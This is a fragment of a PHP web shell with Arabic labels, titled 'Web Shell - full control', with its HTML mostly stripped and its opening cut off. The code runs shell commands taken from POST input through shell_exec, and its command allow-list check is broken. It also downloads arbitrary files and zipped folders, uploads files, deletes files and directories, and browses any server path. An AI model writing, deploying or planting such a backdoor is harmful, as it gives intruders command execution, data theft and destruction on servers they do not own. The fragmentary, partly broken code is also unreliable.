Web Shell - تحكم متكامل

open($zipFile, ZipArchive::OVERWRITE) !== TRUE) { echo "❌ لا يمكن إنشاء ملف الأرشيف."; exit; } $folderPath = realpath($folderToDownload); $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($folderPath), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($folderPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); header('Content-Type: application/zip'); header('Content-Disposition: attachment; filename="'.basename($folderToDownload).'.zip"'); header('Content-Length: ' . filesize($zipFile)); readfile($zipFile); unlink($zipFile); exit; } else { echo "❌ المجلد غير موجود."; exit; } } // خاصية تنزيل الملف if (isset($_GET['download_file'])) { $fileToDownload = $_GET['download_file']; if (file_exists($fileToDownload)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($fileToDownload) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($fileToDownload)); flush(); readfile($fileToDownload); exit; } else { echo "❌ الملف غير موجود."; exit; } } if ($_SERVER["REQUEST_METHOD"] === "POST") { if (isset($_POST["command"])) { $command = $_POST["command"]; // قائمة بالأوامر المسموح بها (يمكن توسيعها) $commandParts = explode(' ', $command); if (in_array($commandParts[0])) { $output = shell_exec($command . " 2>&1"); echo "

$output

"; } else { echo "

❌ الأمر غير مسموح به!

"; } exit; } elseif (isset($_FILES["file"])) { $targetFile = basename($_FILES["file"]["name"]); if (move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile)) { echo "✅ تم رفع الملف بنجاح!"; } else { echo "❌ فشل في رفع الملف."; } exit; } elseif (isset($_POST["delete_file"])) { $fileToDelete = $_POST["delete_file"]; if (file_exists($fileToDelete)) { if (unlink($fileToDelete)) { echo "✅ تم حذف الملف بنجاح!"; } else { echo "❌ فشل في حذف الملف."; } } else { echo "❌ الملف غير موجود."; } exit; } elseif (isset($_POST["delete_folder"])) { $folderToDelete = $_POST["delete_folder"]; if (is_dir($folderToDelete)) { if (deleteDirectory($folderToDelete)) { echo "✅ تم حذف المجلد بنجاح!"; } else { echo "❌ فشل في حذف المجلد."; } } else { echo "❌ المجلد غير موجود."; } exit; } elseif (isset($_POST["new_folder"])) { $folderName = $_POST["new_folder"]; if (!file_exists($folderName)) { if (mkdir($folderName)) { echo "✅ تم إنشاء المجلد بنجاح!"; } else { echo "❌ فشل في إنشاء المجلد."; } } else { echo "❌ المجلد موجود بالفعل."; } exit; } } $dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd(); $files = scandir($dir); ?> Web Shell - تحكم متكامل

🔹 Web Shell - تحكم متكامل 🔹

🔹 النتيجة:

👈 أدخل أمرًا واضغط تنفيذ...

📂 استعراض المجلدات والملفات:

↩️ العودة

"; continue; } $path = realpath("$dir/$file"); $icon = is_dir($path) ? "📁" : "📄"; echo "

"; // عند النقر على اسم المجلد يتم الدخول إليه، أما الملفات فيمكن تنزيلها مباشرة echo "$icon $file"; echo "

"; if (is_dir($path)) { echo "⬇️ تحميل"; echo ""; } else { echo "⬇️ تحميل"; echo ""; } echo "

"; echo "

"; } ?>

🔹 Web Shell - تحكم متكامل 🔹

🔹 النتيجة:

📂 استعراض المجلدات والملفات:

⬆️ رفع الملفات:

📂 إنشاء مجلد جديد: